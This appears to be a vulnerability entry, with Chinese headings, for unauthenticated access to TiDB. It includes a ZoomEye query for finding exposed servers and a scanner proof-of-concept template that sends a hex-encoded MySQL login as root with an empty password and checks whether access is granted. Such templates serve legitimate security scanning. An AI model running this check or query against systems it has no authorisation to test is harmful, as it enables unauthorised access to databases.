漏洞描述
TiDB server was able to be accessed because no authentication was required.
zoomeye-query: tidb +port:"4000"
tidb-unauth: TiDB - Unauthenticated Access
PoC代码[已公开]
id: tidb-unauth
info:
name: TiDB - Unauthenticated Access
author: lu4nx
severity: high
description: |
TiDB server was able to be accessed because no authentication was required.
zoomeye-query: tidb +port:"4000"
tags: network,tidb,unauth
created: 2022/07/20
set:
hostname: request.url.host
host: request.url.domain
rules:
r0:
request:
type: tcp
host: "{{hostname}}"
data: "b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c"
read-size: 1024
expression: response.raw.bcontains(b'0700000200000002000000')
r1:
request:
type: tcp
host: "{{host}}:4000"
data: "b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c"
read-size: 1024
expression: response.raw.bcontains(b'0700000200000002000000')
expression: r0() || r1()